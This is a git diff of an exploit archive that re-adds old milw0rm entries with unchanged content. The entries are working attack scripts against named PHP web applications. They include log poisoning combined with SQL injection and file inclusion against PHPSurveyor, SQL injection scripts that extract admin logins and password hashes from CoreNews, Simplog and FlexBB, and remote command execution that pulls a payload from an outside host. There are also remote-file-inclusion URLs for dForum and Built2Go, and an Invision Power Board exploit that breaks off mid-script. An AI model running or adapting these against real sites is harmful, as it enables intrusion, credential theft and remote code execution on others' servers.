host path cmd OPTIONS\r\n"; +echo "host: target server (ip/hostname)\r\n"; +echo "path: path to PHPSurveyor\r\n"; +echo "cmd: a shell command\r\n"; +echo "Options:\r\n"; +echo " -p[port]: specify a port other than 80\r\n"; +echo " -P[ip:port]: specify a proxy\r\n"; +echo "Examples:\r\n"; +echo "php ".$argv[0]." localhost /surveyor/ cat config.php\r\n"; +echo "php ".$argv[0]." localhost /surveyor/ ls -la -p81\r\n"; +echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n"; +die; +} + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); + +function quick_dump($string) +{ + $result='';$exa='';$cont=0; + for ($i=0; $i<=strlen($string)-1; $i++) + { + if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) + {$result.=" .";} + else + {$result.=" ".$string[$i];} + if (strlen(dechex(ord($string[$i])))==2) + {$exa.=" ".dechex(ord($string[$i]));} + else + {$exa.=" 0".dechex(ord($string[$i]));} + $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} + } + return $exa."\r\n".$result; +} +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.$host.':'.$port; die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid proxy...';die; + } + $parts=explode(':',$proxy); + echo "Connecting to ".$parts[0].":".$parts[1]." 
proxy...\r\n"; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock); + #debug + #echo "\r\n".$html; +} + +$host=$argv[1]; +$path=$argv[2]; +$cmd="";$port=80;$proxy=""; + +for ($i=3; $i<=$argc-1; $i++){ +$temp=$argv[$i][0].$argv[$i][1]; +if (($temp<>"-p") and ($temp<>"-P")) +{$cmd.=" ".$argv[$i];} +if ($temp=="-p") +{ + $port=str_replace("-p","",$argv[$i]); +} +if ($temp=="-P") +{ + $proxy=str_replace("-P","",$argv[$i]); +} +} +$cmd=urlencode($cmd); +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + +echo "[1] Injecting some code in log files ...\r\n\r\n"; +$CODE=""; +$packet="GET ".$p.$CODE." HTTP/1.0\r\n"; +$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: close\r\n\r\n"; +sendpacketii($packet); +sleep(3); + +//fill with possible locations... 
+$paths=array( +"../../../../../../../../../../var/log/httpd/access_log", +"../../../../../../../../../../var/log/httpd/error_log", +"../apache/logs/error.log", +"../apache/logs/access.log", +"../../apache/logs/error.log", +"../../apache/logs/access.log", +"../../../apache/logs/error.log", +"../../../apache/logs/access.log", +"../../../../apache/logs/error.log", +"../../../../apache/logs/access.log", +"../../../../../apache/logs/error.log", +"../../../../../apache/logs/access.log", +"../../../../../../apache/logs/error.log", +"../../../../../../apache/logs/access.log", +"../logs/error.log", +"../logs/access.log", +"../../logs/error.log", +"../../logs/access.log", +"../../../logs/error.log", +"../../../logs/access.log", +"../../../../logs/error.log", +"../../../../logs/access.log", +"../../../../../logs/error.log", +"../../../../../logs/access.log", +"../../../../../../logs/error.log", +"../../../../../../logs/access.log", +"../../../../../../../../../../etc/httpd/logs/acces_log", +"../../../../../../../../../../etc/httpd/logs/acces.log", +"../../../../../../../../../../etc/httpd/logs/error_log", +"../../../../../../../../../../etc/httpd/logs/error.log", +"../../../../../../../../../../var/www/logs/access_log", +"../../../../../../../../../../var/www/logs/access.log", +"../../../../../../../../../../usr/local/apache/logs/access_log", +"../../../../../../../../../../usr/local/apache/logs/access.log", +"../../../../../../../../../../var/log/apache/access_log", +"../../../../../../../../../../var/log/apache/access.log", +"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/www/logs/error_log", +"../../../../../../../../../../var/www/logs/error.log", +"../../../../../../../../../../usr/local/apache/logs/error_log", +"../../../../../../../../../../usr/local/apache/logs/error.log", +"../../../../../../../../../../var/log/apache/error_log", +"../../../../../../../../../../var/log/apache/error.log", 
+"../../../../../../../../../../var/log/access_log", +"../../../../../../../../../../var/log/error_log" +); + + +for ($i=0; $i<=count($paths)-1; $i++) +{ +$a=$i+2; + +//bypassing magic_quotes=On encoding paths with CHAR() MySQL func +$mysql_encoded="CHAR("; + for ($j=0; $j<=strlen($paths[$i])-1; $j++) + { + $mysql_encoded.=ord($paths[$i][$j]); + if ($j==strlen($paths[$i])-1) + {$mysql_encoded.=",0)";} //a null char to break inclusion path, encoded as CHAR(0) + else + {$mysql_encoded.=",";} + } + +$SQL="999 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,".$mysql_encoded.",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM surveys"; +echo "[".$a."] Trying with -> - ".$SQL." - for \"surveyd\" argument\r\n\r\n"; +$SQL=urlencode($SQL); +$packet ="GET ".$p."save.php HTTP/1.0\r\n"; +$packet.="User-Agent: GoogleBot/2.1\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Cookie: surveyid=$SQL; cmd=".$cmd.";\r\n"; //let's poison the thissurvey['language'] value, thorugh cookies, log this :) +$packet.="Connection: Close\r\n\r\n"; +#debug +#echo quick_dump($packet); +sendpacketii($packet); +if (strstr($html,"56789")) + { + echo "Exploit succeeded...\r\n"; + $temp=explode("56789",$html); + die($temp[1]); + } +} +//if you are here... +echo "Exploit failed..."; +?> + +# milw0rm.com [2006-04-20] diff --git a/platforms/php/webapps/1704.pl b/platforms/php/webapps/1704.pl index 7c6d621cf..e137a441d 100755 --- a/platforms/php/webapps/1704.pl +++ b/platforms/php/webapps/1704.pl 
@@ -1,62 +1,62 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=24 -#Usage: corenews.pl -use IO::Socket; -if(@ARGV != 2) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-24\r\n"; - print "- CoreNews <= 2.0.1 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to CoreNews ex: /corenews/\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $cnserver = $ARGV[0]; - $cnserver =~ s/(http:\/\/)//eg; - $cnhost = "http://".$cnserver; - $cndir = $ARGV[1]; - $cnport = "80"; - $cntar = "preview.php?userid="; - $cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*"; - $cnreq = $cnhost.$cndir.$cntar.$cnxp; - #Sending data... - header(); - print "- Trying to connect: $cnserver\r\n"; - $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...\n"; - print $cn "GET $cnreq HTTP/1.1\n"; - print $cn "Accept: */*\n"; - print $cn "Referer: $cnhost\n"; - print $cn "Accept-Language: tr\n"; - print $cn "User-Agent: NukeZilla\n"; - print $cn "Cache-Control: no-cache\n"; - print $cn "Host: $cnserver\n"; - print $cn "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$cn>) { - if ($answer =~ /2022(.*?)20223([\d,a-f]{32})2203/) { - print "- Exploit succeed!\r\n"; - print "- Username: $1\r\n"; - print "- MD5 HASH of PASSWORD: $2\r\n"; - print "- If you crack hash you can use RFI with example ->\r\n"; - print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txt\r\n"; - exit(); - } - } - #Exploit failed... 
- print "- Exploit failed\n" -} - -# nukedx.com [2006-04-21] - -# milw0rm.com [2006-04-21] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=24 +#Usage: corenews.pl +use IO::Socket; +if(@ARGV != 2) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-24\r\n"; + print "- CoreNews <= 2.0.1 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to CoreNews ex: /corenews/\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $cnserver = $ARGV[0]; + $cnserver =~ s/(http:\/\/)//eg; + $cnhost = "http://".$cnserver; + $cndir = $ARGV[1]; + $cnport = "80"; + $cntar = "preview.php?userid="; + $cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*"; + $cnreq = $cnhost.$cndir.$cntar.$cnxp; + #Sending data... + header(); + print "- Trying to connect: $cnserver\r\n"; + $cn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "- Connection failed...\n"; + print $cn "GET $cnreq HTTP/1.1\n"; + print $cn "Accept: */*\n"; + print $cn "Referer: $cnhost\n"; + print $cn "Accept-Language: tr\n"; + print $cn "User-Agent: NukeZilla\n"; + print $cn "Cache-Control: no-cache\n"; + print $cn "Host: $cnserver\n"; + print $cn "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$cn>) { + if ($answer =~ /2022(.*?)20223([\d,a-f]{32})2203/) { + print "- Exploit succeed!\r\n"; + print "- Username: $1\r\n"; + print "- MD5 HASH of PASSWORD: $2\r\n"; + print "- If you crack hash you can use RFI with example ->\r\n"; + print "- Example: $cnhost$cndir?show=http://yourhost.com/file.txt\r\n"; + exit(); + } + } + #Exploit failed... 
+ print "- Exploit failed\n" +} + +# nukedx.com [2006-04-21] + +# milw0rm.com [2006-04-21] diff --git a/platforms/php/webapps/1705.pl b/platforms/php/webapps/1705.pl index 5694d189b..9f0b408f2 100755 --- a/platforms/php/webapps/1705.pl +++ b/platforms/php/webapps/1705.pl 
@@ -1,60 +1,60 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=25 -#Usage: simplog.pl -use IO::Socket; -if(@ARGV != 2) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-25\r\n"; - print "- Simplog <= 0.93 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to Simplog ex: /simplog/\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $spserver = $ARGV[0]; - $spserver =~ s/(http:\/\/)//eg; - $sphost = "http://".$spserver; - $spdir = $ARGV[1]; - $spport = "80"; - $sptar = "preview.php?adm=tem&blogid=1&tid="; - $spxp = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*"; - $spreq = $sphost.$spdir.$sptar.$spxp; - #Sending data... - header(); - print "- Trying to connect: $spserver\r\n"; - $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed...\n"; - print $sp "GET $spreq HTTP/1.1\n"; - print $sp "Accept: */*\n"; - print $sp "Referer: $sphost\n"; - print $sp "Accept-Language: tr\n"; - print $sp "User-Agent: NukeZilla\n"; - print $sp "Cache-Control: no-cache\n"; - print $sp "Host: $spserver\n"; - print $sp "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$sp>) { - if ($answer =~ /25552(.*?)25553([\d,a-f]{32})25554/) { - print "- Exploit succeed!\r\n"; - print "- Username: $1\r\n"; - print "- MD5 HASH of PASSWORD: $2\r\n"; - exit(); - } - } - #Exploit failed... 
- print "- Exploit failed\n" -} - -# nukedx.com [2006-04-21] - -# milw0rm.com [2006-04-21] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=25 +#Usage: simplog.pl +use IO::Socket; +if(@ARGV != 2) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-25\r\n"; + print "- Simplog <= 0.93 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to Simplog ex: /simplog/\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $spserver = $ARGV[0]; + $spserver =~ s/(http:\/\/)//eg; + $sphost = "http://".$spserver; + $spdir = $ARGV[1]; + $spport = "80"; + $sptar = "preview.php?adm=tem&blogid=1&tid="; + $spxp = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*"; + $spreq = $sphost.$spdir.$sptar.$spxp; + #Sending data... + header(); + print "- Trying to connect: $spserver\r\n"; + $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed...\n"; + print $sp "GET $spreq HTTP/1.1\n"; + print $sp "Accept: */*\n"; + print $sp "Referer: $sphost\n"; + print $sp "Accept-Language: tr\n"; + print $sp "User-Agent: NukeZilla\n"; + print $sp "Cache-Control: no-cache\n"; + print $sp "Host: $spserver\n"; + print $sp "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$sp>) { + if ($answer =~ /25552(.*?)25553([\d,a-f]{32})25554/) { + print "- Exploit succeed!\r\n"; + print "- Username: $1\r\n"; + print "- MD5 HASH of PASSWORD: $2\r\n"; + exit(); + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +# nukedx.com [2006-04-21] + +# milw0rm.com [2006-04-21] 
diff --git a/platforms/php/webapps/1706.txt b/platforms/php/webapps/1706.txt
index f32b8d138..96e460590 100755
--- a/platforms/php/webapps/1706.txt
+++ b/platforms/php/webapps/1706.txt
@@ -1,33 +1,33 @@
-dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
-Method found by nukedx,
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploit works on dForum <= 1.5
-http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
-Files ->
-about.php
-admin.php
-anmelden.php
-closethread.php
-config.php
-delpost.php
-delthread.php
-dfcode.php
-download.php
-editanoc.php
-forum.php
-login.php
-makethread.php
-menu.php
-newthread.php
-openthread.php
-overview.php
-post.php
-suchen.php
-user.php
-userconfig.php
-userinfo.php
-verwalten.php
-Original advisory: http://www.nukedx.com/?viewdoc=27
-# nukedx.com [2006-04-21]
-
-# milw0rm.com [2006-04-21]
+dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
+Method found by nukedx,
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploit works on dForum <= 1.5
+http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
+Files ->
+about.php
+admin.php
+anmelden.php
+closethread.php
+config.php
+delpost.php
+delthread.php
+dfcode.php
+download.php
+editanoc.php
+forum.php
+login.php
+makethread.php
+menu.php
+newthread.php
+openthread.php
+overview.php
+post.php
+suchen.php
+user.php
+userconfig.php
+userinfo.php
+verwalten.php
+Original advisory: http://www.nukedx.com/?viewdoc=27
+# nukedx.com [2006-04-21]
+
+# milw0rm.com [2006-04-21]
diff --git a/platforms/php/webapps/1707.pl b/platforms/php/webapps/1707.pl
index 3282f46c1..ed13d6634 100755
--- a/platforms/php/webapps/1707.pl
+++ b/platforms/php/webapps/1707.pl
@@ -1,69 +1,69 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=28 -#Usage: ladder.pl -#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages. -use IO::Socket; -if(@ARGV < 3) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-28\r\n"; - print "- My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit\r\n"; -} -sub main::urlEncode { - my ($string) = @_; - $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; - #$string# =~ tr/.//; - return $string; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to My Gaming Ladder ex: /ladder/\r\n"; - print "- -> Command to execute ex: ls -la\r\n"; - print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $echoing = ""; - $ldserver = $ARGV[0]; - $ldserver =~ s/(http:\/\/)//eg; - $ldhost = "http://".$ldserver; - $lddir = $ARGV[1]; - $ldport = "80"; - $ldtar = "stats.php?dir[func]=&dir[base]=http://www.misssera.com.tr/old/rce.txt%3F&command="; - $ldcmd = ""; for ($i=2; $i<=$#ARGV; $i++) {$ldcmd.="%20".urlEncode($ARGV[$i]);}; - $ldreq = $ldhost.$lddir.$ldtar.$ldcmd; - #Sending data... 
- header(); - print "- Trying to connect: $ldserver\r\n"; - $ld = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ldserver", PeerPort => "$ldport") || die "- Connection failed...\n"; - print $ld "GET $ldreq HTTP/1.1\n"; - print $ld "Accept: */*\n"; - print $ld "Referer: $ldhost\n"; - print $ld "Accept-Language: tr\n"; - print $ld "User-Agent: NukeZilla\n"; - print $ld "Cache-Control: no-cache\n"; - print $ld "Host: $ldserver\n"; - print $ld "Connection: close\n\n"; - print "- Connected...\r\n"; - $echoing = "No"; - while ($answer = <$ld>) { - if ($answer =~ /NukedX here/) { $echoing = "Yes"; } - if ($answer =~ /NukedX was here/) { print "- End of results\n"; exit(); } - if ($echoing =~ /Yes/) { - if ($answer =~ /NukedX here/) { print "- Command executed succesfully here is results\r\n"; } - else { print "$answer"; } - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -# milw0rm.com [2006-04-22] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=28 +#Usage: ladder.pl +#Dork: "Ladder Scripts by http://www.mygamingladder.com" 40.500 pages. +use IO::Socket; +if(@ARGV < 3) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-28\r\n"; + print "- My Gaming Ladder Combo System <= 7.0 Remote Command Execution Exploit\r\n"; +} +sub main::urlEncode { + my ($string) = @_; + $string =~ s/(\W)/"%" . unpack("H2", $1)/ge; + #$string# =~ tr/.//; + return $string; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to My Gaming Ladder ex: /ladder/\r\n"; + print "- -> Command to execute ex: ls -la\r\n"; + print "- This exploit needs allow_url_fopen set to 1 and register_globals on\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... 
+ $echoing = ""; + $ldserver = $ARGV[0]; + $ldserver =~ s/(http:\/\/)//eg; + $ldhost = "http://".$ldserver; + $lddir = $ARGV[1]; + $ldport = "80"; + $ldtar = "stats.php?dir[func]=&dir[base]=http://www.misssera.com.tr/old/rce.txt%3F&command="; + $ldcmd = ""; for ($i=2; $i<=$#ARGV; $i++) {$ldcmd.="%20".urlEncode($ARGV[$i]);}; + $ldreq = $ldhost.$lddir.$ldtar.$ldcmd; + #Sending data... + header(); + print "- Trying to connect: $ldserver\r\n"; + $ld = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ldserver", PeerPort => "$ldport") || die "- Connection failed...\n"; + print $ld "GET $ldreq HTTP/1.1\n"; + print $ld "Accept: */*\n"; + print $ld "Referer: $ldhost\n"; + print $ld "Accept-Language: tr\n"; + print $ld "User-Agent: NukeZilla\n"; + print $ld "Cache-Control: no-cache\n"; + print $ld "Host: $ldserver\n"; + print $ld "Connection: close\n\n"; + print "- Connected...\r\n"; + $echoing = "No"; + while ($answer = <$ld>) { + if ($answer =~ /NukedX here/) { $echoing = "Yes"; } + if ($answer =~ /NukedX was here/) { print "- End of results\n"; exit(); } + if ($echoing =~ /Yes/) { + if ($answer =~ /NukedX here/) { print "- Command executed succesfully here is results\r\n"; } + else { print "$answer"; } + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +# milw0rm.com [2006-04-22] diff --git a/platforms/php/webapps/1711.txt b/platforms/php/webapps/1711.txt index 7926125e7..07a94feee 100755 --- a/platforms/php/webapps/1711.txt +++ b/platforms/php/webapps/1711.txt 
@@ -1,11 +1,11 @@
-Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
-
-in movie_cls.php
-
-# require_once("$full_path/review_cls.php");
-
-usage:
-
-# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
-
-# milw0rm.com [2006-04-23]
+Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability
+
+in movie_cls.php
+
+# require_once("$full_path/review_cls.php");
+
+usage:
+
+# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a
+
+# milw0rm.com [2006-04-23]
diff --git a/platforms/php/webapps/1713.pl b/platforms/php/webapps/1713.pl
index 6b67b6d32..c94553f0a 100755
--- a/platforms/php/webapps/1713.pl
+++ b/platforms/php/webapps/1713.pl
@@ -1,57 +1,57 @@
-#!/usr/bin/perl
-use IO::Socket;
-#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
-#
-# 1- First Do Login
-# 2- View This Link :D
-#
-# index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
-#
-#-----------------------------------------------#
-#
-#--[ D3vil-0x1 | Devil-00 ]--#
-#
-# SecurityGurus.net
-# Div The PHP Security Fucking Tool :D
-
-##-- Start --#
-
-$host = "127.0.0.1";
-$path = "/flexbb/";
-$injec = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";
-
-##-- _END_ --##
-# $host :-
-# The Host Name Without http:// | exm. www.vic.com
-#
-# $path :-
-# FlexBB Dir On Server | exm. /flexbb/
-#
-# $mycookie :-
-# Your Login Info To Forum * Not The Real Password || The Hashed One *
-
-
-$sock = IO::Socket::INET->new (
- PeerAddr => "$host",
- PeerPort => "80",
- Proto => "tcp"
- ) or die("[!] Connect To Server Was Filed");
-
-##-- DONT TRY TO EDIT ME --##
-$evildata = "GET ".$path."index.php?page=showprofile&id=".$injec." 
HTTP/1.1\n";
-$evildata .= "Host: $host \n";
-$evildata .= "Accept: */* \n";
-$evildata .= "Keep-Alive: 300\n";
-$evildata .= "Connection: keep-alive \n\n";
-
-print $sock $evildata;
-
-while($ans = <$sock>){
- $usr_newans = $ans;
- $pwd_newans = $ans;
- #print $newans;
- $usr_newans =~ m/FlexBB - Viewing Profile: (.*?)<\/title>/ && print "[+] Username is :- ".$1."\n";
- $pwd_newans =~ m/<a href="2" target="_blank">(.*?)<\/a>/ && print "[+] Password is :- ".$1."\n";
-}
-
-# milw0rm.com [2006-04-24]
+#!/usr/bin/perl
+use IO::Socket;
+#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
+#
+# 1- First Do Login
+# 2- View This Link :D
+#
+# index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
+#
+#-----------------------------------------------#
+#
+#--[ D3vil-0x1 | Devil-00 ]--#
+#
+# SecurityGurus.net
+# Div The PHP Security Fucking Tool :D
+
+##-- Start --#
+
+$host = "127.0.0.1";
+$path = "/flexbb/";
+$injec = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";
+
+##-- _END_ --##
+# $host :-
+# The Host Name Without http:// | exm. www.vic.com
+#
+# $path :-
+# FlexBB Dir On Server | exm. /flexbb/
+#
+# $mycookie :-
+# Your Login Info To Forum * Not The Real Password || The Hashed One *
+
+
+$sock = IO::Socket::INET->new (
+ PeerAddr => "$host",
+ PeerPort => "80",
+ Proto => "tcp"
+ ) or die("[!] Connect To Server Was Filed");
+
+##-- DONT TRY TO EDIT ME --##
+$evildata = "GET ".$path."index.php?page=showprofile&id=".$injec." 
HTTP/1.1\n";
+$evildata .= "Host: $host \n";
+$evildata .= "Accept: */* \n";
+$evildata .= "Keep-Alive: 300\n";
+$evildata .= "Connection: keep-alive \n\n";
+
+print $sock $evildata;
+
+while($ans = <$sock>){
+ $usr_newans = $ans;
+ $pwd_newans = $ans;
+ #print $newans;
+ $usr_newans =~ m/<title>FlexBB - Viewing Profile: (.*?)<\/title>/ && print "[+] Username is :- ".$1."\n";
+ $pwd_newans =~ m/<a href="2" target="_blank">(.*?)<\/a>/ && print "[+] Password is :- ".$1."\n";
+}
+
+# milw0rm.com [2006-04-24]
diff --git a/platforms/php/webapps/1720.pl b/platforms/php/webapps/1720.pl
index 6ea34ee7a..84b278d14 100755
--- a/platforms/php/webapps/1720.pl
+++ b/platforms/php/webapps/1720.pl
@@ -1,194 +1,194 @@
-#!/usr/bin/perl
-
-## Invision Power Board 2.* commands execution exploit by RST/GHC
-## vulnerable versions <= 2.1.5
-## tested on 2.1.4, 2.0.2
-##
-## (c)oded by 1dt.w0lf
-## RST/GHC
-## http://rst.void.ru
-## http://ghc.ru
-
-
-use IO::Socket;
-use Getopt::Std;
-
-getopts("l:h:p:d:f:v:");
-
-$host = $opt_h;
-$dir = $opt_d;
-$login = $opt_l;
-$password = $opt_p;
-$forum = $opt_f;
-$version = $opt_v || 0;
-
-$|++;
-
-header();
-if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
-
-print "[~] SERVER : $host\r\n";
-print "[~] PATH : $dir\r\n";
-print "[~] LOGIN : $login\r\n";
-print "[~] PASSWORD : $password\r\n";
-print "[~] TARGET : $version";
-print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
-print "\r\n";
-
-print "[~] Login ... ";
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-$login =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
-$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
-$post = 'UserName='.$login.'&PassWord='.$password;
-$loggedin = 0;
-print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Connection: close\r\n";
-print $sock "Content-Type: application/x-www-form-urlencoded\n";
-print $sock "Content-length: ".length($post)."\r\n\r\n";
-print $sock "$post";
-print $sock "\r\n\r\n";
-while (<$sock>)
-{
- if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
-}
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-print $sock "GET ${dir}index.php HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n\r\n";
-while (<$sock>)
-{
- if(/act=Login&CODE=03/) { $loggedin = 1; last; }
-}
-if($loggedin) { print " [ DONE ]\r\n"; }
-else { print " [ FAILED ]\r\n"; exit(); }
-
-print "[+] SID: $sid\r\n";
-
-print "[~] Try get md5_check ...";
-$sock = 
IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-if($version==1)
- {
- print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
- }
-else
- {
- print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
- }
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n\r\n";
-while (<$sock>)
- {
- if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/) { $md5_check = $1; last; }
- if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
- }
-close($sock);
-if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
-else { print " [ FAILED ]\r\n"; exit(); }
-
-print "[~] Create new message ...";
